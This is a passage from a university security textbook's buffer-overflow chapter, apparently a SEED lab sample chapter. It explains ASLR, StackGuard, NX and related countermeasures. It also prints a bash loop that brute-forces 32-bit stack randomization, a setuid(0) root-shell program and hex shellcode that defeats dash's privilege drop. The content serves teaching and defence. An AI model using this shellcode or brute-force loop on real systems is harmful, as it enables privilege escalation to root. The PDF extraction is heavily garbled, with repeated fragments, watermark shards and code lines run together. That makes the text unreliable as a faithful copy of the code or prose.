Page 25: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.8. COUNTERMEASURES: OVERVIEW 87

less likely, but they do not prevent it. If a developer specifies a length that is larger than the

actual size of the buffer, there will still be a buffer overflow vulnerability.

Safer Dynamic Link Library. The above approach requires changes to be made to the

program. If we only have the binary, it will be difficult to change the program. We can use the

dynamic linking to achieve the similar goal. Many programs use dynamic link libraries, i.e.,

the library function code is not included in a program’s binary, instead, it is dynamically linked

to the program. If we can build a safer library and get a program to dynamically link to the

functions in this library, we can make the program safer against buffer overflow attacks.

An example of such a library is libsafe developed by Bell Labs [Baratloo et al., 2000]. It

provides a safer version for the standard unsafe functions, which does boundary checking based

on %ebp and does not allow copy beyond the frame pointer. Another example is the C++ string

module libmib [mibsoftware.com, 1998]. It conceptually supports “limitless” strings instead

of fixed length string buffers. It provides its own versions of functions like strcpy() that are

safer against buffer overflow attacks.

Program Static Analyzer. Instead of eliminating buffer overflow, this type of solution warns

developers of the patterns in code that may potentially lead to buffer overflow vulnerabilities.

The solution is often implemented as a command-line tool or in the editor. The goal is to notify

developers early in the development cycle of potentially unsafe code in their programs. An

example of such a tool is ITS4 by Cigital [Viega et al., 2000], which helps developers identify

dangerous patterns in C/C++ code. There are also many academic papers on this approach.

Programming Language. Developers rely on programming languages to develop their pro-

grams. If a language itself can do some check against buffer overflow, it can remove the burden

from developers. This makes programming language a viable place to implement buffer overflow

countermeasures. The approach is taken by several programming languages, such as Java and

Python, which provide automatic boundary checking. Such languages are considered safer for

development when it comes to avoiding buffer overflow [OWASP, 2014].

Compiler. Compilers are responsible for translating source code into binary code. They

control what sequence of instructions are finally put in the binary. This provides compilers an

opportunity to control the layout of the stack. It also allows compilers to insert instructions into

the binary that can verify the integrity of a stack, as well as eliminating the conditions that are

necessary for buffer overflow attacks. Two well-known compiler-based countermeasures are

Stackshield [Angelfire.com, 2000] and StackGuard [Cowa et al., 1998], which check whether

the return address has been modified or not before a function returns.

The idea of Stackshield is to save a copy of the return address at some safer place. When

using this approach, at the beginning of a function, the compiler inserts instructions to copy the

return address to a location (a shadow stack) that cannot be overflown. Before returning from

the function, additional instructions compare the return address on the stack with the one that

was saved to determine whether an overflow has happened or not.

The idea of StackGuard is to put a guard between the return address and the buffer, so if

the return address is modified via a buffer overflow, this guard will also be modified. When

using this approach, at the start of a function, the compiler adds a random value below the return

address and saves a copy of the random value (referred to as the canary) at a safer place that is

off the stack. Before the function returns, the canary is checked against the saved value. The

e. Develo

elf can do some checan do some

makes programming las programmi

e approach is taken byapproach is taken

vide automatic boundaide automatic bo

it comes to avoiding bs to avoid

mpilers are responsiblers are respo

quence of instructionse of instruct

control the layout of throl the layout of t

at can verify the integrverify the in

r buffer overflow attaffer over

d [Angelfire.com, 2000gelfire.com,

address has been modess has

dea of Stackshield isf Stackshiel

is approach, at the begproach, at th

address to a location (ss to a locat

nction, additional instadditional

saved to determine whsaved to determin

The idea of StackGuaThe idea of Stac

e return address is moreturn address i

ing this approach, at tg this approach

nd saves a cosave

ore

Chap

terer specifies a lengthpecifi

overflow vulnerabilityow vulnera

approach requires chaach require

difficult to change thecult to chang

Many programs useMany program

program’s binary, instram’s binary

brary and get a prograand get a

program safer againstram safer ag

afe developed by Bedeveloped by

unsafe functions, whice functions, whi

nd the frame pointer. Ahe frame pointer. A

1998]. It conceptually. It conceptu

ides its own versions os own versio

s.

tead of eliminating bufead of elimin

de that may potentiallde that may poten

ted as a command-lineted as a comma

opment cycle of poteopment cycle of

S4 by Cigital [Viega eby Cigital [Vie

code. There are alsode. There are

Page 26: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

88 CHAPTER 4. BUFFER OVERFLOW ATTACK

idea is that for an overflow to occur, the canary must also be overflown. More details about

StackGuard will be given in §4.10.

Operating System. Before a program is executed, it needs to be loaded into the system, and

the running environment needs to be set up. This is the job of the loader program in most oper-

ating systems. The setup stage provides an opportunity to counter the buffer overflow problem

because it can dictate how the memory of a program is laid out. A common countermeasure

implemented at the OS loader program is referred to as Address Space Layout Randomization or

ASLR. It tries to reduce the chance of buffer overflows by targeting the challenges that attackers

have to overcome. In particular, it targets the fact that attackers must be able to guess the

address of the injected shellcode. ASLR randomizes the layout of the program memory, making

it difficult for attackers to guess the correct address. We will discuss this approach in §4.9.

Hardware Architecture. The buffer overflow attack described in this chapter depends on

the execution of the shellcode, which is placed on the stack. Modern CPUs support a feature

called NX bit [Wikipedia, 2017o]. The NX bit, standing for No-eXecute, is a technology used

in CPUs to separate code from data. Operating systems can mark certain areas of memory as

non-executable, and the processor will refuse to execute any code residing in these areas. Using

this CPU feature, the attack described earlier in this chapter will not work anymore, if the stack

is marked as non-executable. However, this countermeasure can be defeated using a different

technique called return-to-libc attack. We will discuss the non-executable stack countermeasure

and the return-to-libc attack in Chapter 5.

4.9 Address Randomization

To succeed in buffer overflow attacks, attackers need to get the vulnerable program to “return”

(i.e., jump) to their injected code; they first need to guess where the injected code will be. The

success rate of the guess depends on the attackers’ ability to predict where the stack is located

in the memory. Most operating systems in the past placed the stack in a fixed location, making

correct guesses quite easy.

Is it really necessary for stacks to start from a fixed memory location? The answer is no.

When a compiler generates binary code from source code, for all the data stored on the stack,

their addresses are not hard-coded in the binary code; instead, their addresses are calculated

based on the frame pointer %ebp and stack pointer %esp. Namely, the addresses of the data

on the stack are represented as the offset to one of these two registers, instead of to the starting

address of the stack. Therefore, even if we start the stack from another location, as long as the

%ebp and %esp are set up correctly, programs can always access their data on the stack without

any problem.

For attackers, they need to guess the absolute address, instead of the offset, so knowing the

exact location of the stack is important. If we randomize the start location of a stack, we make

attackers’ job more difficult, while causing no problem to the program. That is the basic idea of

the Address Layout Randomization (ASLR) method, which has been implemented by operating

systems to defeat buffer overflow attacks. This idea does not only apply to stacks, it can also be

used to randomize the location of other types of memory, such as heaps, libraries, etc.

Sam

ple

ckers need to get the ved to get

st need to guess whereed to gues

attackers’ ability to pkers’ ability

in the past placed thee past placed

o start from a fixed mrt from a fix

code from source codefrom so

d in the binary code; ihe binary co

and stack pointerstack p %ehe offset to one of theso one of

even if we start the stn if we start

rectly, programs can aly, programs c

to guess the absolute ato guess the abso

is important. If we rans important. If w

lt, while causing no prt, while causing

omization (ASLR) meization (ASLR

attacks. Thistacks

pe

Chap

terMore details aboutre det

ded into the system, ato the syste

der program in most oer program in m

he buffer overflow proffer overflow

A common countermemmon count

ace Layout RandomizaLayout Rand

ng the challenges that ae challenges t

kers must be able to gust be able t

of the program memorhe program memor

discuss this approachuss this appro

escribed in this chaptibed in this c

ack. Modern CPUs suack. Modern CPU

g for No-eXecute, is ar No-eXecute

ms can mark certain arms can mark certa

te any code residing inte any code resid

chapter will not work ahapter will not w

rmeasure can be defeeasure can be d

non-executablenon-exec

Page 27: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.9. ADDRESS RANDOMIZATION 89

4.9.1 Address Randomization on Linux

To run a program, an operating system needs to load the program into the system first; this is

done by its loader program. During the loading stage, the loader sets up the stack and heap

memory for the program. Therefore, memory randomization is normally implemented in the

loader. For Linux, ELF is a common binary format for programs, so for this type of binary

programs, randomization is carried out by the ELF loader.

To see how the randomization works, we wrote a simple program with two buffers, one on

the stack and the other on the heap. We print out their addresses to see whether the stack and

heap are allocated in different places every time we run the program.

#include <stdio.h>#include <stdlib.h>

void main(){

char x[12];char *y = malloc(sizeof(char)*12);

printf("Address of buffer x (on stack): 0x%x\n", x);printf("Address of buffer y (on heap) : 0x%x\n", y);

}

After compiling the above code, we run it (a.out) under different randomization settings.

Users (privileged users) can tell the loader what type of address randomization they want by

setting a kernel variable called kernel.randomiza va space. As we can see that when

the value 0 is set to this kernel variable, the randomization is turned off, and we always get the

same address for buffers x and y every time we run the code. When we change the value to 1,

the buffer on the stack now have a different location, but the buffer on the heap still gets the

same address. This is because value 1 does not randomize the heap memory. When we change

the value to 2, both stack and heap are now randomized.

// Turn off randomization$ sudo sysctl -w kernel.randomize va space=0kernel.randomize_va_space = 0$ a.outAddress of buffer x (on stack): 0xbffff370Address of buffer y (on heap) : 0x804b008$ a.outAddress of buffer x (on stack): 0xbffff370Address of buffer y (on heap) : 0x804b008

// Randomizing stack address$ sudo sysctl -w kernel.randomize va space=1kernel.randomize_va_space = 1$ a.outAddress of buffer x (on stack): 0xbf9deb10Address of buffer y (on heap) : 0x804b008$ a.outAddress of buffer x (on stack): 0xbf8c49d0 �changedAddress of buffer y (on heap) : 0x804b008S

ple

called

kernel variablel varia

s x andand y every timeevery

k now have a differenthave a diff

because valuebecause value 11 doesd

stack and heap are nowtack and hea

plmizatiopkernel.rpe_va_space

mp

mpfer x (on sta

mfer y (onmmuffer x (mbuffer

amizing stacasctl -w ke

Sa

ndomize_v

Sa

ut

Saress of bufSress of buffS.out Sess of bufSf b

Chap

terx

load the program intothe program

g stage, the loader setge, the load

randomization is normmization is

y format for programsformat for progr

e ELFELF loader.loade

e wrote a simple proge a simple p

int out their addressesout their ad

y time we run the progme we run the

apaphahahahf(char

Chffer x (on st

Cuffer y (onCve code, we run it (code, we run it a.e loader whate loader

and

Page 28: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

90 CHAPTER 4. BUFFER OVERFLOW ATTACK

// Randomizing stack and heap address$ sudo sysctl -w kernel.randomize va space=2kernel.randomize_va_space = 2$ a.outAddress of buffer x (on stack): 0xbf9c76f0Address of buffer y (on heap) : 0x87e6008$ a.outAddress of buffer x (on stack): 0xbfe69700 �changedAddress of buffer y (on heap) : 0xa020008 �changed

4.9.2 Effectiveness of Address RandomizationThe effectiveness on address randomization depends on several factors. A complete imple-

mentation of ASLR wherein all areas of process are located at random places may result in

compatibility issues. A second limitation sometimes is the reduced range of the addresses

available for randomization [Marco-Gisbert and Ripoll, 2014].

One way to measure the available randomness in address space is entropy. If a region of

memory space is said to have n bits of entropy, it implies that on that system, the region’s

base address can take 2n locations with an equal probability. Entropy depends on the type of

ASLR implemented in the kernel. For example, in the 32-bit Linux OS, when static ASLR is

used (i.e., memory regions except program image are randomized), the available entropy is 19

bits for stack and 13 bits for heap [Herlands et al., 2014].

In implementations where the available entropy for randomization is not enough, attackers

can resolve to brute-force attacks. Proper implementations of ASLR (like those available in

grsecurity [Wikipedia, 2017j]) provide methods to make brute force attacks infeasible. One

approach is to prevent an executable from executing for a configurable amount of time if it has

crashed a certain number of times [Wikipedia, 2017b].

Defeating stack randomization on 32-bit machine. As mentioned above, on 32-bit Linux

machines, stacks only have 19 bits of entropy, which means the stack base address can have

219 = 524, 288 possibilities. This number is not that high and can be exhausted easily with

the brute-force approach. To demonstrate this, we write the following script to launch a buffer

overflow attack repeatedly, hoping that our guess on the memory address will be correct by

chance. Before running the script, we need to turn on the memory randomization by setting

kernel.randomize va space to 2.

Listing 4.4: Defeat stack randomization (defeat rand.sh)

#!/bin/bash

SECONDS=0value=0

while [ 1 ]dovalue=$(( $value + 1 ))duration=$SECONDSmin=$(($duration / 60))sec=$(($duration % 60))echo "$min minutes and $sec seconds elapsed."

mpl

e hods to mak

uting for a configurag for a confi

2017b].7b

machine.machine. As mentiA

ropy, which means thwhich mean

er is not that high andnot that h

e this, we write the fos, we write t

t our guess on the meguess on th

e need to turn on the med to turn on the

to 2.

stack randomization (k randomizamamaSaSaS1 SS60)) SCh

apte

rrerereeteteptd pted

veral factors. A compfactors. A c

ed at random places mandom plac

he reduced range of tduced range

014].

dress space is entropydress space is ent

plies that on that systs that on tha

ability. Entropy depenability. Entropy d

32-bit32 Linuxnux OS, w

e randomized), the avarandomized), th

014].4].

randomization isandomizati

ASLR

Page 29: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.10. STACKGUARD 91

echo "The program has been running $value times so far."./stack

done

In the above attack, we have prepared the malicious input in badfile, but due to the

memory randomization, the address we put in the input may not be correct. As we can see

from the following execution trace, when the address is incorrect, the program will crash

(core dumped). However, in our experiment, after running the script for a little bit over 19

minutes (12524 tries), the address we put in badfile happened to be correct, and our

shellcode gets triggered.

......19 minutes and 14 seconds elapsed.The program has been running 12522 times so far....: line 12: 31695 Segmentation fault (core dumped) ./stack19 minutes and 14 seconds elapsed.The program has been running 12523 times so far....: line 12: 31697 Segmentation fault (core dumped) ./stack19 minutes and 14 seconds elapsed.The program has been running 12524 times so far.# �Got the root shell!

We did the above experiment on a 32-bit Linux machine (our pre-built VM is a 32-bit

machine). For 64-bit machines, the brute-force attack will be much more difficult.

Address randomization on Android. A popular attack on Android called stagefright was

discovered in 2015 [Wikipedia, 2017w]. The bug was in Android’s stagefright media library,

and it is a buffer overflow problem. Android has implemented ASLR, but it still had a limitation.

As discussed by Google’s researchers, exploiting the attack depended on the available entropy

in the mmap process memory region. On Android Nexus 5 running version 5.x (with 32-bit), the

entropy was only 8-bit or 256 possibilities, making brute-force attacks quite easy [Brand, 2015].

4.10 StackGuard

Stack-based buffer overflow attacks need to modify the return address; if we can detect whether

the return address is modified before returning from a function, we can foil the attack. There

are many ways to achieve that. One way is to store a copy of the return address at some other

place (not on the stack, so it cannot be overwritten via a buffer overflow), and use it to check

whether the return address is modified. A representative implementation of this approach is

Stackshield [Angelfire.com, 2000]. Another approach is to place a guard between the return

address and the buffer, and use this guard to detect whether the return address is modified

or not. A representative implementation of this approach is StackGuard [Cowa et al., 1998].

StackGuard has been incorporated into compilers, including gcc. We will dive into the details

of this countermeasure.

Sam

ple

perim

chines, the brutes, the

tion on Android.tion on Android A

[Wikipedia, 2017w].ikipedia, 20

erflow problem. Androw problem. A

Google’s researchers, ele’s researc

cess memory region. Omemory regio

y 8-bit or 256 possibilor 256 possi

tackGuardkGuard

sed buffer overflow attuffer overflow

rn address is modifiedddress is mod

ny ways to achieve thays to achie

(not on the stack, so in the stack,

her the return addressher the return ad

ckshield [Angelfire.cockshield [Angel

dress and the buffer,ress and the buf

not. A representativot. A represen

rd has been ihas b

asur

Chap

terrue t

erere malicious input incious input bin the input may not bn the input may

the address is incorree address is in

nt, after running theer running

put inn badfilebadfil happ

hahased. h12522 timhntation fault

Chlapsed.

Chnning 12523 t

Cgmentation fCnds elapsed.Cunning 12524Cell!

bit

Page 30: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

92 CHAPTER 4. BUFFER OVERFLOW ATTACK

4.10.1 The Observation and the Idea

Return Address

buffer[0]

buffer[11]

Buffe

rcop

y

Stackgrows

(High address)

(Low address)

Guard

Figure 4.12: The idea of StackGuard

The key observation of StackGuard is that for a buffer overflow attack to modify the return

address, all the stack memory between the buffer and the return address will be overwritten.

This is because the memory-copy functions, such as strcpy() and memcpy(), copy data

into contiguous memory locations, so it is impossible to selectively affect some of the locations,

while leaving the other intact. If we do not want to affect the value in a particular location during

the memory copy, such as the shaded position marked as Guard in Figure 4.12, the only way to

achieve that is to overwrite the location with the same value that is stored there.

Based on this observation, we can place some non-predictable value (called guard) between

the buffer and the return address. Before returning from the function, we check whether the

value is modified or not. If it is modified, chances are that the return address may have also

been modified. Therefore, the problem of detecting whether the return address is overwritten is

reduced to detecting whether the guard is overwritten. These two problems seem to be the same,

but they are not. By looking at the value of the return address, we do not know whether its value

is modified or not, but since the value of the guard is placed by us, it is easy to know whether

the guard’s value is modified or not.

4.10.2 Manually Adding Code to FunctionLet us look at the following function, and think about whether we can manually add some

code and variables to the function, so in case the buffer is overflown and the return address

is overwritten, we can preempt the returning from the function, thus preventing the malicious

code from being triggered. Ideally, the code we add to the function should be independent from

the existing code of the function; this way, we can use the same code to protect all functions,

regardless of what their functionalities are.

void foo (char *str){

Sam

ple ch as str

ssible to selectivelye to selecti

t to affect the value inffect the valu

marked ased as GuardGuard in

h the same value that ithe same value t

e some non-predictablenon-predic

returning from the fuurning from t

d, chances are that thhances are th

of detecting whether thtecting wheth

is overwritten. Theseerwritten. These

ue of the return addresf the return addres

ue of the guard is placthe guard is

t.

g Code to Functiode to Fununction, and think abion, and thin

ction, so in case the bso in case

mpt the returning frompt the returning f

Ideally, the code we adIdeally, the code

nction; this way, we cnction; this way,

unctionalities are.nctionalities are.SCh

apte

rCh

apte

hhChhBu

fferc

(Low ad

f StackGuardSt

fer overflow attacer overflow

rn addre

Page 31: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.10. STACKGUARD 93

char buffer[12];strcpy (buffer, str);return;

}

First, let us place a guard between the buffer and the return address. We can easily achieve

that by defining a local variable at the beginning of the function. It should be noted that in

reality, how local variables are placed on the stack and in what order is decided by the compiler,

so there is no guarantee that the variable defined first in the source code will be allocated closer

to the return address. We will temporarily ignore this fact, and assume that the variable (called

guard) is allocated between the return address and the rest of the function’s local variables.

We will initialize the variable guard with a secret. This secret is a random number

generated in the main() function, so every time the program runs, the random number is

different. As long as the secret is not predictable, if the overflowing of the buffer has led to the

modification of the return address, it must have also overwritten the value in guard. The only

way not to modify guard while still being able to modify the return address is to overwrite

guard with its original value. Therefore, attackers need to guess what the secret number is,

which is difficult to achieve if the number is random and large enough.

One problem we need to solve is to find a place to store the secret. The secret cannot be

stored on the stack; otherwise, its value can also be overwritten. Heap, data segment, and BSS

segment can be used to store this secret. It should be noted that the secret should never be

hard-coded in the code; or it will not be a secret at all. Even if one can obfuscate the code, it is

just a matter of time before attackers can find the secret value from the code. In the following

code, we define a global variable called secret, and we initialize it with a randomly-generated

number in the main() function (not shown). As we have learned from the beginning of the

section, uninitialized global variables are allocated in the BSS segment.

// This global variable will be initialized with a random// number in the main() function.int secret;

void foo (char *str){

int guard;guard = secret; �Assigning a secret value to guard

char buffer[12];strcpy (buffer, str);

if (guard == secret) �Check whether guard is modified or notreturn;

elseexit(1);

}

From the above code, we can also see that before returning from the function, we always

check whether the value in the local variable guard is still the same as the value in the global

variable secret. If they are still the same, the return address is safe; otherwise, there is a

high possibility that the return address may have been overwritten, so the program should be

terminated.

Sam

ple

aria

function (no(

obal variables are allovariables aeble willlemain() func

ple

plstr ppm

pret;

mp

r[12 muffer, st

am

d == secr

amrn; aat(1);

SaFrom the above codeFrom the above

eck whether the valueck whether the v

riableble secretsecret. If th.

ibility that thility t

Chap

terrererefer and the return addrer and the return

nning of the functioning of the func

stack and in what ordand in what

fined first in the sourcd first in the

ignore this fact, and aore this fact,

address and the rest ofss and the re

ard with a secret. Twith a secret.

o every time the progery time the

predictable, if the ovectable, if th

t must have also overwave also o

till being able to modbeing able to

herefore, attackers neherefore, attacker

e number is random anumber is ran

olve is to find a placeolve is to find a p

its value can also beits value can al

e this secret. It shoulthis secret. It s

will not be a secret atll not be a secr

kers can find theers can fin

cret

Page 32: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

94 CHAPTER 4. BUFFER OVERFLOW ATTACK

4.10.3 StackGuard Implementation in gccThe manually added code described above illustrates how StackGuard works. Since the added

code does not depend on the program logic of the function, we can ask compilers to do that for

us automatically. Namely, we can ask compilers to add the same code to each function: at the

beginning of each function, and before each return instruction inside the function.

The gcc compiler has implemented the StackGuard countermeasure. If you recall, at

the beginning of this chapter, when we launched the buffer overflow attack, we had to turn

off the StackGuard option when compiling the vulnerable program. Let us see what code is

added to each function by gcc. We use our pre-built 32-bit x86-based Ubuntu VM in our

investigation. The version of gcc is 4.6.3. The following listing shows the program from before,

but containing no StackGuard protection implemented by the developer.

#include <string.h>#include <stdio.h>#include <stdlib.h>

void foo(char *str){

char buffer[12];

/* Buffer Overflow Vulnerability */strcpy(buffer, str);

}

int main(int argc, char *argv[]){

foo(argv[1]);

printf("Returned Properly \n\n");return 0;

}

We run the above code with arguments of different length. In the first execution, we use a

short argument, and the program returns properly. In the second execution, we use an argument

that is longer than the size of the buffer. Stackguard can detect the buffer overflow, and terminates

the program after printing out a "stack smashing detected" message.

$ gcc -o prog prog.c$ ./prog helloReturned Properly

$ ./prog hello00000000000

*** stack smashing detected ***: ./prog terminated

To understand how StackGuard is implemented in gcc, we examine the assembly code of

the program. We can ask gcc to generate the assembly code by using the "-S" flag (gcc -Sprog.c). The assembly code is shown in the listing below. The sections where the guard is set

and checked are highlighted. Sam

ple eleple

nts of different length.f different le

properly. In the seconerly. In the s

Stackguard can detectguard can de

ck smashing detsmashing det

mmmamad ***: ./

Guard is implementedis impleme

cc to generate the asseto generate the

ode is shown in the listode is shown in t

ed.d.

apte

rorks. Since the addedSince the ad

compilers to do that fopilers to do t

to each function: at thch function

the function.he function.

measure. If you recalasure. If you

flow attack, we had tottack, we ha

am. Let us see what cLet us see

86-based Ubuntu VMased Ubuntu

shows the program froms the program

developer.oper. ahahahaChChCCCC

Page 33: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.10. STACKGUARD 95

foo:.LFB0:

.cfi_startprocpushl %ebp.cfi_def_cfa_offset 8.cfi_offset 5, -8movl %esp, %ebp.cfi_def_cfa_register 5subl $56, %espmovl 8(%ebp), %eaxmovl %eax, -28(%ebp)// Canary Set Startmovl %gs:20, %eaxmovl %eax, -12(%ebp)xorl %eax, %eax// Canary Set Endmovl -28(%ebp), %eaxmovl %eax, 4(%esp)leal -24(%ebp), %eaxmovl %eax, (%esp)call strcpy// Canary Check Startmovl -12(%ebp), %eaxxorl %gs:20, %eaxje .L2call stack chk fail// Canary Check End

.L2:leave.cfi_restore 5.cfi_def_cfa 4, 4ret.cfi_endproc

We first examine the code that sets the guard value on stack. The relevant part of the code is

shown in the listing below. In StackGuard, the guard is called canary.

movl %gs:20, %eaxmovl %eax, -12(%ebp)xorl %eax, %eax

The code above first takes a value from %gs:20 (offset 20 from the GS segment register,

which points to a memory region isolated from the stack). The value is copied to %eax, and

then further copied to %ebp-12. From the assembly code, we can see that the random secret

used by StackGuard is stored at %gs:20, while the canary is stored at location %ebp-12 on

the stack. The code basically copies the secret value to canary. Let us see how the canary is

checked before function return.

movl -12(%ebp), %eaxxorl %gs:20, %eaxje .L2call __stack_chk_fail

Sam

pee eele4, leplmine the code that setsthe code that

ting below. In StackGelow. In Sta

mp

, %eax

m-12 m, %eax

ode above first takes aove first ta

oints to a memory regto a memory

rther copied tocopied to %ebp-%ey StackGuard is storeckGuard is

tack. The code basicaack. The code ba

ked before function reked before funSmovl -12(%Sorl %gs:SL2

pterrerereeteteptptppapapaahahahCh

axChChCart Cax CCC

Page 34: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

96 CHAPTER 4. BUFFER OVERFLOW ATTACK

.L2:leaveret

In the code above, the program reads the canary on the stack from the memory at %ebp-12,

and saves the value to %eax. It then compares this value with the value at %gs:20, where

canary gets its initial value. The next instruction, je, checks if the result of the previous

operation (XOR) is 0. If yes, the canary on the stack remains intact, indicating that no overflow

has happened. The code will proceed to return from the function. If je detected that the

XOR result is not zero, i.e., the canary on the stack was not equal to the value at %gs:20, an

overflow has occurred. The program call stack chk fail, which prints an error message

and terminates the program.

Ensuring Canary Properties As discussed before, for the StackGuard solution, the secret

value that the canary is checked against needs to satisfy two requirements:

• It needs to be random.

• It cannot be stored on the stack.

The first property is ensured by initializing the canary value using /dev/urandom. More

details about it can be found at the link [xorl, 2010]. The second property is ensured by keeping

a copy of the canary value in %gs:20. The memory segment pointed by the GS register in

Linux is a special area, which is different from the stack, heap, BSS segment, data segment,

and the text segment. Most importantly, this GS segment is physically isolated from the stack,

so a buffer overflow on the stack or heap will not be able to change anything in the GS segment.

On 32-bit x86 architectures, gcc keeps the canary value at offset 20 from %gs and on 64-bit

x86 architectures, gcc stores the canary value at offset 40 from %gs.

4.11 Defeating the Countermeasure in bash and dashAs we have explained before, the dash shell in Ubuntu 16.04 drops privileges when it detects

that the effective UID does not equal to the real UID. This can be observed from dashprogram’s changelog. We can see an additional check in Line �, which compares real and

effective user/group IDs.

// main() function in main.c has the following changes:

++ uid = getuid();++ gid = getgid();

++ /*++ * To limit bogus system(3) or popen(3) calls in setuid binaries,++ * require -p flag to work in this situation.++ */++ if (!pflag && (uid != geteuid() || gid != getegid())) { �

++ setuid(uid);++ setgid(gid);++ /* PS1 might need to be changed accordingly. */++ choose_ps1();++ }

mpl

e be a

ary value at oalue a

at offsetffset 4040 fromfro %g

rmeasure inmeasure in bahell in Ubuntu 16.04 din Ubuntu 16

to the real UID. Thie real UID

additional check in Lional check

ms the folmmamaem(3) or p

Sa

work in t

SaSaid != geteuiSSSeed to beSCh

apte

rrerere memory atmory at %ebp-1ebvalue atalue a %gs:20%gs:20, wh

the result of the preve result of the

indicating that no oveating that no

on. IfIf jeje detected thdet

al to the value athe value at %gswhich prints an errorh prints an e

e StackGuard solutionckGuard so

o requirements:ements:

ary value usingary value using /dev//dThe second property ishe second prope

ory segment pointed by segment point

e stack, heap, BSS setack, heap, BS

s physically is physic

anyt

Page 35: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.11. DEFEATING THE COUNTERMEASURE IN BASH AND DASH 97

The countermeasure implemented in dash can be defeated. One approach is not to invoke

/bin/sh in our shellcode; instead, we can invoke another shell program. This approach

requires another shell program, such as zsh to be present in the system. Another approach is to

change the real user ID of the victim process to zero before invoking dash. We can achieve

this by invoking setuid(0) before executing execve() in the shellcode. Let us do an

experiment with this approach. We first change the /bin/sh symbolic link, so it points back

to /bin/dash (in case we have changed it to zsh before):

$ sudo ln -sf /bin/dash /bin/sh

To see how the countermeasure in dash works and how to defeat it using the system call

setuid(0), we write the following C program.

// dash_shell_test.c#include <stdio.h>#include <sys/types.h>#include <unistd.h>int main(){

char *argv[2];argv[0] = "/bin/sh";argv[1] = NULL;

setuid(0); // Set real UID to 0 �

execve("/bin/sh", argv, NULL);

return 0;}

The above program can be compiled and set up using the following commands (we need to

make it root-owned Set-UID program):

$ gcc dash_shell_test.c -o dash_shell_test$ sudo chown root dash_shell_test$ sudo chmod 4755 dash_shell_test$ dash_shell_test# �Got the root shell!

After running the program, we did get a root shell. If we comment out Line �, we will only

get a normal shell, because dash has dropped the root privilege. We need to turn setuid(0)into binary code, so we can add it to our shellcode. The revised shellcode is described below.

Listing 4.5: Revised shellcode (revised shellcode.py)

shellcode= ("\x31\xc0" # xorl %eax,%eax �

"\x31\xdb" # xorl %ebx,%ebx �

"\xb0\xd5" # movb $0xd5,%al �

"\xcd\x80" # int $0x80 �

#---- The code below is the same as the one shown before ---"\x31\xc0" # xorl %eax,%eax"\x50" # pushl %eax"\x68""//sh" # pushl $0x68732f2f

ee m can be compiled andbe compiled

Set-UIDet-UID program):program

plest.c -opt dash_shp5 dash_shpst

mproot shell!

ning the program, we dhe program,

l shell, becausell, because dashdcode, so we can add ie, so we can

Listing 4.5: ReListing 4.5a=

Sa

\xc0"

Sa

\x31\xdb"

Sa"\xb0\xd5"S"\xcd\x80"S#---- The cS"\x31\xc0"S"

Chap

terbe defeated. One apefeat

oke another shell proother shel

present in the systemsent in the sys

o zero before invokingo before inv

ng execve()ecve() in thein

ge thee the /bin/sh/bin/sh symb

to zshsh before):before):

ptash works and how toworks and ho

program. aahahahChChCh"; CCreal UID tCgv NULC

Page 36: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

98 CHAPTER 4. BUFFER OVERFLOW ATTACK

"\x68""/bin" # pushl $0x6e69622f"\x89\xe3" # movl %esp,%ebx"\x50" # pushl %eax"\x53" # pushl %ebx"\x89\xe1" # movl %esp,%ecx"\x99" # cdq"\xb0\x0b" # movb $0x0b,%al"\xcd\x80" # int $0x80

).encode(’latin-1’)

The updated shellcode adds four instructions at the beginning: The first and third instructions

together (Lines � and �) set eax to 0xd5 (0xd5 is setuid()’s system call number). The

second instruction (Line �) sets ebx to zero; the ebx register is used to pass the argument 0to the setuid() system call. The fourth instruction (Line �) invokes the system call. Using

this revised shellcode, we can attempt the attack on the vulnerable program when /bin/sh is

linked to /bin/dash.

If we use the above shellcode to replace the one used in exploit.py (Listing 4.2), and try

the attack again, we will be able to get a root shell, even though we do not use zsh any more.

4.12 SummaryBuffer overflow vulnerabilities are caused when a program puts data into a buffer but forgets to

check the buffer boundary. It does not seem that such a mistake can cause a big problem, other

than crashing the program. As we can see from this chapter, when a buffer is located on the

stack, a buffer overflow problem can cause the return address on the stack to be overwritten,

resulting in the program to jump to the location specified by the new return address. By putting

malicious code in the new location, attackers can get the victim program to execute the malicious

code. If the victim program is privileged, such as a Set-UID program, a remote server, a

device driver, or a root daemon, the malicious code can be executed using the victim program’s

privilege, which can lead to security breaches.

Buffer overflow vulnerability was the number one vulnerability in software for quite a long

time, because it is quite easy to make such mistakes. Developers should use safe practices when

saving data to a buffer, such as checking the boundary or specifying how much data can be

copied to a buffer. Many countermeasures have been developed, some of which are already

incorporated in operating systems, compilers, software development tools, and libraries. Not

all countermeasures are fool-proof; some can be easily defeated, such as the randomization

countermeasure for 32-bit machines and the non-executable stack countermeasure. In Chapter 5,

we show how to use the return-to-libc attack to defeat the non-executable stack countermeasure.

� Hands-on Lab ExerciseWe have developed a SEED lab for this chapter. The lab is called Buffer-Overflow VulnerabilityLab, and it is hosted on the SEED website: https://seedsecuritylabs.org.

The learning objective of this lab is for students to gain the first-hand experience on buffer-

overflow vulnerability by putting what they have learned about the vulnerability from class

into action. In this lab, students will be given a program with a buffer-overflow vulnerability;

